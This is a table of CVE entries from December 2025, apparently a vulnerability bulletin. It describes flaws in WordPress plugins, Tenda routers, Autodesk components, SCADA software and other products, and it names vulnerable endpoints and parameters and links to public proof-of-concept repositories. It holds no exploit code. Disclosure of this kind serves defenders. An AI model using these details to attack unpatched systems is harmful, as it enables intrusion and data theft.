| whyun--WPCOM Member | The WPCOM Member plugin for WordPress is vulnerable to authentication bypass via brute force in all versions up to, and including, 1.7.16. This is due to weak OTP (One-Time Password) generation using only 6 numeric digits combined with a 10-minute validity window and no rate limiting on verification attempts. This makes it possible for unauthenticated attackers to brute-force the verification code and authenticate as any user, including administrators, if they know the target's phone number, and the target does not notice or ignores the SMS notification with the OTP. | 2025-12-16 | 8.1 | CVE-2025-14002 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4f02ee56-40bd-4132-92e1-e2897ff2a4c4?source=cve https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/class-sesstion.php#L29 https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/member-functions.php#L833 https://plugins.trac.wordpress.org/changeset/3411048/wpcom-member |
| Radiometer Medical Aps--ABL90 FLEX and ABL90 FLEX PLUS Analyzers | A vulnerability exists in multiple Radiometer products that allows an attacker with physical access to the analyzer to extract credential information. The vulnerability is due to a weakness in the design and insufficient credential protection in the operating system. Other related CVEs are CVE-2025-14095 and CVE-2025-14097. Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required Configuration for Exposure: Attacker requires physical access to the analyzer. Temporary workaround: Only authorized people can physically access the analyzer. Permanent solution: Local Radiometer representatives will contact all affected customers to discuss a permanent solution. Exploit Status: Researchers have provided a working proof-of-concept (PoC). Radiometer is not aware of any public exploit code at the time of this publication. | 2025-12-17 | 8.4 | CVE-2025-14096 | https://www.radiometer.com/myradiometer |
| kraftplugins--Demo Importer Plus | The Demo Importer Plus plugin for WordPress is vulnerable to unauthorized modification of data, loss of data, and privilege escalation due to a missing capability check on the Ajax::handle_request() function in all versions up to, and including, 2.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger a full site reset, dropping all database tables except users/usermeta and re-running wp_install(), which also assigns the Administrator role to the attacking subscriber account. | 2025-12-18 | 8.8 | CVE-2025-14364 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ff9364a9-18f8-47d3-b992-e39c8d99d6ea?source=cve https://plugins.trac.wordpress.org/changeset/3420645/demo-importer-plus/trunk/inc/Ajax.php |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in ose-openshift-apiserver. This vulnerability allows internal network enumeration, service discovery, limited information disclosure, and potential denial-of-service (DoS) through Server-Side Request Forgery (SSRF) due to missing IP address and network-range validation when processing user-supplied image references. | 2025-12-16 | 8.5 | CVE-2025-14443 | https://access.redhat.com/security/cve/CVE-2025-14443 RHBZ#2420964 https://github.com/tuxerrante/openshift-ssrf |
| F5--NGINX Ingress Controller | A vulnerability exists in NGINX Ingress Controller's nginx.org/rewrite-target annotation validation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2025-12-17 | 8.3 | CVE-2025-14727 | https://my.f5.com/manage/s/article/K000158176 |
| themeisle--Redirection for Contact Form 7 | The Redirection for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'move_file_to_upload' function in all versions up to, and including, 3.2.7. This makes it possible for unauthenticated attackers to copy arbitrary files on the affected site's server. If 'allow_url_fopen' is set to 'On', it is possible to upload a remote file to the server. | 2025-12-21 | 8.1 | CVE-2025-14800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b249ec90-a364-4644-94fb-d42eb6cc4d9a?source=cve https://plugins.trac.wordpress.org/changeset/3423970/wpcf7-redirect https://plugins.trac.wordpress.org/browser/wpcf7-redirect/tags/3.2.7/classes/class-wpcf7r-save-files.php#L180 |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to unrestricted file upload, which may allow an attacker to remotely execute arbitrary code. | 2025-12-18 | 8.8 | CVE-2025-14849 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to directory traversal, which may allow an attacker to delete arbitrary files. | 2025-12-18 | 8.1 | CVE-2025-14850 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Tenda--AC18 | A security vulnerability has been detected in Tenda AC18 15.03.05.05. The impacted element is the function strcpy of the file /goform/GetParentControlInfo of the component HTTP Request Handler. The manipulation of the argument mac leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-21 | 8.8 | CVE-2025-14992 | VDB-337686 \| Tenda AC18 HTTP Request GetParentControlInfo strcpy stack-based overflow VDB-337686 \| CTI Indicators (IOB, IOC, IOA) Submit #719073 \| Tenda AC18 V1.0 15.03.05.05 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/GetParentControlInfo/GetParentControlInfo.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/GetParentControlInfo/GetParentControlInfo.md#reproduce https://www.tenda.com.cn/ |
| Tenda--AC18 | A vulnerability was detected in Tenda AC18 15.03.05.05. This affects the function sprintf of the file /goform/SetDlnaCfg of the component HTTP Request Handler. The manipulation of the argument scanList results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. | 2025-12-21 | 8.8 | CVE-2025-14993 | VDB-337687 \| Tenda AC18 HTTP Request SetDlnaCfg sprintf stack-based overflow VDB-337687 \| CTI Indicators (IOB, IOC, IOA) Submit #719084 \| Tenda AC18 V1.0 15.03.05.05 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/SetDlnaCfg/SetDlnaCfg.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/SetDlnaCfg/SetDlnaCfg.md#reproduce https://www.tenda.com.cn/ |
| Tenda--FH1201 | A flaw has been found in Tenda FH1201 and FH1206 1.2.0.14(408)/1.2.0.8(8155). This impacts the function strcat of the file /goform/webtypelibrary of the component HTTP Request Handler. This manipulation of the argument webSiteId causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2025-12-21 | 8.8 | CVE-2025-14994 | VDB-337688 \| Tenda FH1201/FH1206 HTTP Request webtypelibrary strcat stack-based overflow VDB-337688 \| CTI Indicators (IOB, IOC, IOA) Submit #719153 \| Tenda FH1201 V1.2.0.14(408) Stack-based Buffer Overflow Submit #719155 \| Tenda FH1206 1.2.0.8(8155) Stack-based Buffer Overflow (Duplicate) https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/webtyplibrary/webtypelibrary.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1206/webtyplibrary/webtypelibrary.md https://www.tenda.com.cn/ |
| Tenda--FH1201 | A vulnerability has been found in Tenda FH1201 1.2.0.14(408). Affected is the function sprintf of the file /goform/SetIpBind. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2025-12-21 | 8.8 | CVE-2025-14995 | VDB-337689 \| Tenda FH1201 SetIpBind sprintf stack-based overflow VDB-337689 \| CTI Indicators (IOB, IOC, IOA) Submit #719154 \| Tenda FH1201 V1.2.0.14(408) Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/SetIpBind/SetIpBind.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/SetIpBind/SetIpBind.md#reproduce https://www.tenda.com.cn/ |
| NVIDIA--Resiliency Extension | NVIDIA Resiliency Extension for Linux contains a vulnerability in log aggregation, where an attacker could cause predictable log-file names. A successful exploit of this vulnerability may lead to escalation of privileges, code execution, denial of service, information disclosure, and data tampering. | 2025-12-16 | 8.4 | CVE-2025-33225 | https://nvd.nist.gov/vuln/detail/CVE-2025-33225 https://www.cve.org/CVERecord?id=CVE-2025-33225 https://nvidia.custhelp.com/app/answers/detail/a_id/5746 |
| Nozomi Networks--Guardian | A Stored Cross-Site Scripting vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing a JavaScript payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information. | 2025-12-18 | 8.9 | CVE-2025-40892 | https://security.nozominetworks.com/NN-2025:13-01 |
| Nozomi Networks--Guardian | A path traversal vulnerability was discovered in the Import Arc data archive functionality due to insufficient validation of the input file. An authenticated user with limited privileges, by uploading a specifically-crafted Arc data archive, can potentially write arbitrary files in arbitrary paths, altering the device configuration and/or affecting its availability. | 2025-12-18 | 8.1 | CVE-2025-40898 | https://security.nozominetworks.com/NN-2025:15-01 |
| Linksys--Linksys E9450-SG | Successful exploitation of the vulnerability could allow an attacker with local network access to send a specially crafted URL to access certain administration functions without login credentials. | 2025-12-19 | 8.8 | CVE-2025-52692 | https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-118/ |
| BullWall--Ransomware Containment | BullWall Ransomware Containment contains excluded file paths, such as '$recycle.bin', that are not monitored. An attacker with file write permissions could bypass detection by renaming a directory to one of the excluded names. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 8.8 | CVE-2025-62001 |  |
| Microsoft--Azure Cosmos DB | Improper neutralization of input during web page generation ('cross-site scripting') in Azure Cosmos DB allows an unauthorized attacker to perform spoofing over a network. | 2025-12-18 | 8.3 | CVE-2025-64675 | Azure Cosmos DB Spoofing Vulnerability |
| Microsoft--Office Out-of-Box Experience | Improper neutralization of input during web page generation ('cross-site scripting') in Office Out-of-Box Experience allows an unauthorized attacker to perform spoofing over a network. | 2025-12-18 | 8.2 | CVE-2025-64677 | Office Out-of-Box Experience Spoofing Vulnerability |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/ListEvents.php` file. When filtering events by type, the `WhichType` POST parameter is not properly sanitized or type-casted before being used in multiple SQL queries. This allows any authenticated user to execute arbitrary SQL commands, including time-based blind SQL injection attacks. Any authenticated user, regardless of their privilege level, can execute arbitrary queries on the database. This could allow them to exfiltrate, modify, or delete any data in the database, including user credentials, financial data, and personal information, leading to a full compromise of the application's data. Version 6.5.3 fixes the issue. | 2025-12-17 | 8.8 | CVE-2025-66395 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c9xf-f3gr-xfwv |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.3, the allowRegistration, acceptKiosk, reloadKiosk, and identifyKiosk functions in the Kiosk Manager feature suffers from broken access control, allowing any authenticated user to allow and accept kiosk registrations, and perform other Kiosk Manager actions such as reload and identify. Version 6.5.3 fixes the issue. | 2025-12-17 | 8.3 | CVE-2025-66397 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-32vr-ch3p-wmr5 |
| C4illin--ConvertX | ConvertX is a self-hosted online file converter. In versions prior to 0.16.0, the endpoint `/upload` allows an authenticated user to write arbitrary files on the system, overwriting binaries and allowing code execution. The upload function takes `file.name` directly from user-supplied data without any sanitization of the name, thus allowing arbitrary file write. This can be used to overwrite system binaries with attacker-provided ones, allowing full code execution. Version 0.16.0 contains a patch for the issue. | 2025-12-16 | 8.8 | CVE-2025-66449 | https://github.com/C4illin/ConvertX/security/advisories/GHSA-cpww-gwgc-p72r https://github.com/C4illin/ConvertX/commit/550f472451755d095cf5802bc91f403e85b7129e https://github.com/C4illin/ConvertX/blob/4ae2aab66ace7cdcc14c5a16ecaaf2372b9ccbdf/src/pages/upload.tsx#L27-L30 |
| Mintlify--Mintlify Platform | A Server-Side Template Injection (SSTI) vulnerability in the MDX Rendering Engine in Mintlify Platform before 2025-11-15 allows remote attackers to execute arbitrary code via inline JSX expressions in an MDX file. | 2025-12-19 | 8.3 | CVE-2025-67843 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 |
| error311--FileRise | FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 2.7.1 are vulnerable to Stored Cross-Site Scripting (XSS) due to unsafe handling of browser-renderable user uploads when served through the sharing and download endpoints. An attacker who can get a crafted SVG (primary) or HTML (secondary) file stored in a FileRise instance can cause JavaScript execution when a victim opens a generated share link (and in some cases via the direct download endpoint). This impacts share links (`/api/file/share.php`) and direct file access / download path (`/api/file/download.php`), depending on browser/content-type behavior. Version 2.7.1 fixes the issue. | 2025-12-16 | 8.9 | CVE-2025-68116 | https://github.com/error311/FileRise/security/advisories/GHSA-35pp-ggh6-c59c |
| opensourcepos--opensourcepos | Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. Starting in version 3.4.0 and prior to version 3.4.2, a Stored Cross-Site Scripting (XSS) vulnerability exists in the "Return Policy" configuration field. The application does not properly sanitize user input before saving it to the database or displaying it on receipts. An attacker with access to the "Store Configuration" (such as a rogue administrator or an account compromised via the separate CSRF vulnerability) can inject malicious JavaScript payloads into this field. These payloads are executed in the browser of any user (including other administrators and sales staff) whenever they view a receipt or complete a transaction. This can lead to session hijacking, theft of sensitive data, or unauthorized actions performed on behalf of the victim. The vulnerability has been patched in version 3.4.2 by ensuring the output is escaped using the `esc()` function in the receipt template. As a temporary mitigation, administrators should ensure the "Return Policy" field contains only plain text and strictly avoid entering any HTML tags. There is no code-based workaround other than applying the patch. | 2025-12-17 | 8.1 | CVE-2025-68147 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-xgr7-7pvw-fpmh https://github.com/opensourcepos/opensourcepos/commit/22297a https://github.com/Nixon-H/CVE-2025-68147-OSPOS-Stored-XSS |
| sebhildebrandt--systeminformation | systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch. | 2025-12-16 | 8.1 | CVE-2025-68154 | https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68 |
| opensourcepos--opensourcepos | Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. Starting in version 3.4.0 and prior to version 3.4.2, a Cross-Site Request Forgery (CSRF) vulnerability exists in the application's filter configuration. The CSRF protection mechanism was **explicitly disabled**, allowing the application to process state-changing requests (POST) without verifying a valid CSRF token. An unauthenticated remote attacker can exploit this by hosting a malicious web page. If a logged-in administrator visits this page, their browser is forced to send unauthorized requests to the application. A successful exploit allows the attacker to silently create a new Administrator account with full privileges, leading to a complete takeover of the system and loss of confidentiality, integrity, and availability. The vulnerability has been patched in version 3.4.2. The fix re-enables the CSRF filter in `app/Config/Filters.php` and resolves associated AJAX race conditions by adjusting token regeneration settings. As a workaround, administrators can manually re-enable the CSRF filter in `app/Config/Filters.php` by uncommenting the protection line. However, this is not recommended without applying the full patch, as it may cause functionality breakage in the Sales module due to token synchronization issues. | 2025-12-17 | 8.8 | CVE-2025-68434 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-wjm4-hfwg-5w5r https://github.com/opensourcepos/opensourcepos/pull/4349 https://github.com/opensourcepos/opensourcepos/commit/d575c8da9a1d7af8313a1e758e000e243f5614ef https://github.com/Nixon-H/CVE-2025-68434-OSPOS-CSRF-Unauthorized-Administrator-Creation |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Pentaho Data Integration and Analytics Community Dashboard Editor plugin versions before 10.2.0.4, including 9.3.0.x and 8.3.x, deserialize untrusted JSON data without constraining the parser to approved classes and methods. | 2025-12-15 | 8.8 | CVE-2025-9121 | https://support.pentaho.com/hc/en-us/articles/41832536185613--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Deserialization-of-Untrusted-Data-Versions-before-10-2-0-4-Impacted-CVE-2025-9121 |
| Kentico--Xperience | An access control bypass vulnerability in Kentico Xperience allows administrators to modify global administrator user privileges via unauthorized requests. Attackers could potentially compromise global administrator accounts and invalidate security-sensitive macros by manipulating user privilege levels. | 2025-12-18 | 7.2 | CVE-2020-36890 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 10 Administrator Access Control Bypass |
| Kentico--Xperience | A cryptography vulnerability in Kentico Xperience allows attackers to potentially manipulate URL hash values through existing hashing mechanisms. The hotfix introduces an additional security layer to prevent hash value reuse and potential exploitation. | 2025-12-18 | 7.5 | CVE-2021-47712 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.102 URL Hashing Cryptography Vulnerability |
| HappyFiles--HappyFiles Pro | Missing Authorization vulnerability in HappyFiles HappyFiles Pro happyfiles-pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HappyFiles Pro: from n/a through 1.8.1. | 2025-12-21 | 7.7 | CVE-2023-25446 | https://vdp.patchstack.com/database/wordpress/plugin/happyfiles-pro/vulnerability/wordpress-happyfiles-pro-plugin-1-8-1-broken-access-control?_s_id=cve |
| D-Link--DAP-1325 | D-Link DAP-1325 firmware version 1.01 contains a broken access control vulnerability that allows unauthenticated attackers to download device configuration settings without authentication. Attackers can exploit the /cgi-bin/ExportSettings.sh endpoint to retrieve sensitive configuration information by directly accessing the export settings script. | 2025-12-16 | 7.5 | CVE-2023-53896 | ExploitDB-51556 D-Link DAP-1325 Product Webpage VulnCheck Advisory: D-Link DAP-1325 Hardware A1 Unauthenticated Configuration Download |
| Kentico--Xperience | A denial of service vulnerability in Kentico Xperience allows attackers to launch DoS attacks via specially crafted requests to the GetResource handler. Improper input validation enables remote attackers to potentially disrupt service availability through maliciously constructed requests. | 2025-12-18 | 7.5 | CVE-2023-53934 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.98 GetResource Handler Denial of Service |
| Hubstaff--Hubstaff | Hubstaff 1.6.14 contains a DLL search order hijacking vulnerability that allows attackers to replace a missing system32 wow64log.dll with a malicious library. Attackers can generate a custom DLL using Metasploit and place it in the system32 directory to obtain a reverse shell during application startup. | 2025-12-18 | 7.8 | CVE-2023-53937 | ExploitDB-51461 Official Product Homepage VulnCheck Advisory: Hubstaff 1.6.14 DLL Search Order Hijacking via wow64log Library |
| Alfonzm--Codigo Markdown Editor | Codigo Markdown Editor 1.0.1 contains a code execution vulnerability that allows attackers to run arbitrary system commands by crafting a malicious markdown file. Attackers can embed a video source with an onerror event that executes shell commands through Node.js child_process module when the file is opened. | 2025-12-18 | 7.8 | CVE-2023-53940 | ExploitDB-51432 Product GitHub Repository VulnCheck Advisory: Codigo Markdown Editor 1.0.1 Electron Arbitrary Code Execution via Markdown File |
| ltb-project--LDAP Tool Box Self Service Password | LDAP Tool Box Self Service Password 1.5.2 contains a password reset vulnerability that allows attackers to manipulate HTTP Host headers during token generation. Attackers can craft malicious password reset requests that generate tokens sent to a controlled server, enabling potential account takeover by intercepting and using stolen reset tokens. | 2025-12-19 | 7.5 | CVE-2023-53958 | ExploitDB-51275 Official Product Homepage VulnCheck Advisory: LDAP Tool Box Self Service Password 1.5.2 Account Takeover via HTTP Host Header |
| Utarit Information Services Inc.--SoliClub | Use of Hard-coded Credentials vulnerability in Utarit Information Services Inc. SoliClub allows Read Sensitive Constants Within an Executable. This issue affects SoliClub: from 5.2.4 before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-1029 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| Utarit Informatics Services Inc.--SoliClub | Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Utarit Informatics Services Inc. SoliClub allows Query System for Information. This issue affects SoliClub: from 5.2.4 before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-1030 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| Utarit Informatics Services Inc.--SoliClub | Authorization Bypass Through User-Controlled Key vulnerability in Utarit Informatics Services Inc. SoliClub allows Functionality Misuse. This issue affects SoliClub: from 5.2.4 before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-1031 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| Autodesk--Shared Components | A maliciously crafted CATPRODUCT file, when parsed through certain Autodesk products, can force a Heap-Based Overflow vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10881 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted X_T file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10882 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted CATPRODUCT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10883 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10884 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10886 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10887 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10888 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10889 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10898 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10899 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10900 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| kstover--Ninja Forms The Contact Form Builder That Grows With You | The Ninja Forms - The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.13.2. This is due to the plugin not properly verifying that a user is authorized before the `ninja-forms-views` REST endpoints return form metadata and submission content. This makes it possible for unauthenticated attackers to read arbitrary form definitions and submission records via a leaked bearer token granted they can load any page containing the Submissions Table block. NOTE: The developer released a patch for this issue in 3.13.1, but inadvertently introduced a REST API endpoint in which a valid bearer token could be minted for arbitrary form IDs, making this patch ineffective. | 2025-12-17 | 7.5 | CVE-2025-11924 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4240cdae-9122-443e-8a7e-3369e74384be?source=cve https://plugins.trac.wordpress.org/changeset/3415563/ninja-forms |
| wpxpo--Post Grid Gutenberg Blocks for News, Magazines, Blog Websites PostX | The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites - PostX plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the '/ultp/v2/get_dynamic_content/' REST API endpoint in all versions up to, and including, 5.0.3. This makes it possible for unauthenticated attackers to retrieve sensitive user metadata, including password hashes. | 2025-12-21 | 7.5 | CVE-2025-12980 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ff3b3-de41-4ac4-b825-b3238725ca44?source=cve https://plugins.trac.wordpress.org/changeset/3421729/ultimate-post/trunk/classes/Blocks.php |
| Menulux Software Inc.--Mobile App | Authorization Bypass Through User-Controlled Key vulnerability in Menulux Software Inc. Mobile App allows Exploitation of Trusted Identifiers. This issue affects Mobile App: before 9.5.8. | 2025-12-16 | 7.5 | CVE-2025-13474 | https://www.usom.gov.tr/bildirim/tr-25-0457 |
| bplugins--HTML5 Audio Player The Ultimate No-Code Podcast, MP3 & Audio Player | The HTML5 Audio Player - The Ultimate No-Code Podcast, MP3 & Audio Player plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions from 2.4.0 up to, and including, 2.5.1 via the getIcyMetadata() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-19 | 7.2 | CVE-2025-13999 | https://www.wordfence.com/threat-intel/vulnerabilities/id/989b4b9d-e22e-46a7-8ebc-5c8b33f98111?source=cve https://plugins.trac.wordpress.org/changeset?old=3394789&old_path=html5-audio-player%2Ftags%2F2.5.1%2Finc%2FCore%2FAjax.php&new=3419843&new_path=html5-audio-player%2Ftags%2F2.5.2%2Finc%2FCore%2FAjax.php |
| LINE Corporation--LINE client for iOS | LINE client for iOS prior to 15.4 allows man-in-the-middle attacks due to improper SSL/TLS certificate validation in an integrated financial SDK. The SDK interfered with the application's network processing, causing server certificate verification to be disabled for a significant portion of network traffic, which could allow a network-adjacent attacker to intercept or modify encrypted communications. | 2025-12-15 | 7.7 | CVE-2025-14022 | https://hackerone.com/reports/2853445 |
| EnterpriseDB--Hybrid Manager - LTS | EDB Hybrid Manager contains a flaw that allows an unauthenticated attacker to directly access certain gRPC endpoints. This could allow an attacker to read potentially sensitive data or possibly cause a denial-of-service by writing malformed data to certain gRPC endpoints. This flaw has been remediated in EDB Hybrid Manager 1.3.3, and customers should consider upgrading to 1.3.3 as soon as possible. The flaw is due to a misconfiguration in the Istio Gateway, which manages authentication and authorization for the affected endpoints. The security policy relies on an explicit definition of required permissions in the Istio Gateway configuration, and the affected endpoints were not defined in the configuration. This allowed requests to bypass both authentication and authorization within a Hybrid Manager service. All versions of Hybrid Manager - LTS should be upgraded to 1.3.3, and all versions of Hybrid Manager - Innovation should be upgraded to 2025.12. | 2025-12-15 | 7 | CVE-2025-14038 | https://www.enterprisedb.com/docs/security/advisories/cve202514038/ |
| livecomposer--Live Composer Free WordPress Website Builder | The Live Composer - Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.2 via deserialization of untrusted input in the dslc_module_posts_output shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2025-12-21 | 7.5 | CVE-2025-14071 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b15c991-5256-405c-8382-85dba6f032ba?source=cve https://plugins.trac.wordpress.org/browser/live-composer-page-builder/trunk/modules/posts/module.php#L2807 https://plugins.trac.wordpress.org/browser/live-composer-page-builder/tags/1.5.53/modules/posts/module.php#L2807 https://github.com/live-composer/live-composer-page-builder/commit/2b0b430ab107eb6cb72196251e429a695c11e41b https://plugins.trac.wordpress.org/changeset/3419715/live-composer-page-builder/trunk/modules/posts/module.php |
